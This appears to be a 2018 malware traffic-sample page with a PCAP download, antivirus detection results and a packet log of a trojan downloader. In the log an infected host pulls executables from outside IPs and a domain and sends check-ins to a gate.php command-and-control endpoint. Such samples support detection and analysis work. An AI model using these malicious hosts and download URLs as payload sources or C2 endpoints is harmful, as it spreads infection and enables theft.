Androm Trojan Downloader Loads Zusy Emotet Banking Trojan Malware PCAP file download traffic sample az.exe 11.exe

Download Attachments

  • 1 pcap nice (Date added: January 26, 2018 5:55 am; Added by: admin; File size: 64 KB; Downloads: 27)
50 engines detected this file
SHA-256: 5831264367b6ee1636606b2d9f46111cb7ab4b3b007e49e2f921df5f7d484f06
File name: output.112714662.txt
File size: 128 KB
Last analysis: 2018-01-24 18:48:00 UTC
Community score: -1

VBA32: Backdoor.Androm
VIPRE: Trojan.Win32.Generic!BT
ViRobot: Trojan.Win32.Agent.131072.EN
Webroot: W32.Trojan.Emotet

37 engines detected this file
SHA-256: b134507e22448a801b8a6d1fa6bc32a7d4b389afb15ec721b83e24bdde2e61e1
File name: az.exe
File size: 409.5 KB
Last analysis: 2018-01-22 06:22:47 UTC

Endgame: malicious (high confidence)
eScan: Gen:Variant.Zusy.272363
ESET-NOD32: a variant of Win32/Kryptik.GBQS
F-Secure: Gen:Variant.Zusy.272363

2018-01-25 23:56:34.218090 IP 192.168.1.102.53301 > 109.234.36.233.80: Flags [P.], seq 0:512, ack 1, win 256, length 512: HTTP: GET /bot/Miner/bin/Release/LoaderBot.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: 109.234.36.233
Connection: Keep-Alive

2018-01-25 23:56:34.314369 IP 192.168.1.102.53301 > 109.234.36.233.80: Flags [.], ack 2921, win 256, length 0
2018-01-25 23:56:34.315369 IP 192.168.1.102.53301 > 109.234.36.233.80: Flags [.], ack 5841, win 256, length 0
2018-01-25 23:56:34.407529 IP 192.168.1.102.53301 > 109.234.36.233.80: Flags [.], ack 8761, win 256, length 0
2018-01-25 23:56:34.408132 IP 192.168.1.102.53301 > 109.234.36.233.80: Flags [.], ack 11681, win 256, length 0
2018-01-25 23:56:34.412251 IP 192.168.1.102.53301 > 109.234.36.233.80: Flags [.], ack 16061, win 256, length 0
2018-01-25 23:56:34.412445 IP 192.168.1.102.53301 > 109.234.36.233.80: Flags [.], ack 17138, win 252, length 0

2018-01-25 23:56:56.788410 IP 192.168.1.102.53307 > 199.188.200.47.80: Flags [S], seq 1611515500, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2018-01-25 23:56:56.879346 IP 192.168.1.102.53307 > 199.188.200.47.80: Flags [.], ack 390261784, win 256, length 0
2018-01-25 23:56:56.892069 IP 192.168.1.102.53307 > 199.188.200.47.80: Flags [P.], seq 0:492, ack 1, win 256, length 492: HTTP: GET /yestogocrypt.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: gg.usdipc.com
Connection: Keep-Alive

2018-01-25 23:57:14.089718 IP 192.168.1.102.53308 > 179.43.147.227.80: Flags [P.], seq 0:487, ack 1, win 256, length 487: HTTP: GET /exe/11.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: 179.43.147.227
Connection: Keep-Alive

2018-01-25 23:57:25.721761 IP 192.168.1.102.53310 > 179.43.147.227.80: Flags [P.], seq 0:136, ack 1, win 256, length 136: HTTP: POST /1/gate.php?1CEEA5ED34393712659782 HTTP/1.1
Host: 179.43.147.227
Pragma: no-cache
Content-type: text/html
Connection: close

2018-01-25 23:57:25.838993 IP 192.168.1.102.53310 > 179.43.147.227.80: Flags [.], ack 192, win 255, length 0
2018-01-25 23:57:25.845862 IP 192.168.1.102.53310 > 179.43.147.227.80: Flags [F.], seq 136, ack 192, win 255, length 0
2018-01-25 23:57:25.871760 IP 192.168.1.102.53311 > 179.43.147.227.80: Flags [S], seq 3700082443, win 64240, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2018-01-25 23:57:25.979314 IP 192.168.1.102.53311 > 179.43.147.227.80: Flags [.], ack 11382739, win 256, length 0
2018-01-25 23:57:25.985021 IP 192.168.1.102.53311 > 179.43.147.227.80: Flags [P.], seq 0:155, ack 1, win 256, length 155: HTTP: POST /1/gate.php?1CEEA5ED34393712659782 HTTP/1.1
Host: 179.43.147.227
Pragma: no-cache
Content-type: text/html
Connection: close
Content-Length: 9

2018-01-25 23:57:27.861644 IP 192.168.1.102.53316 > 179.43.147.227.80: Flags [P.], seq 0:112, ack 1, win 256, length 112: HTTP: GET /exe/az.exe HTTP/1.1
Host: 179.43.147.227/exe/az.exe
Pragma: no-cache
Content-type: text/html
Connection: close
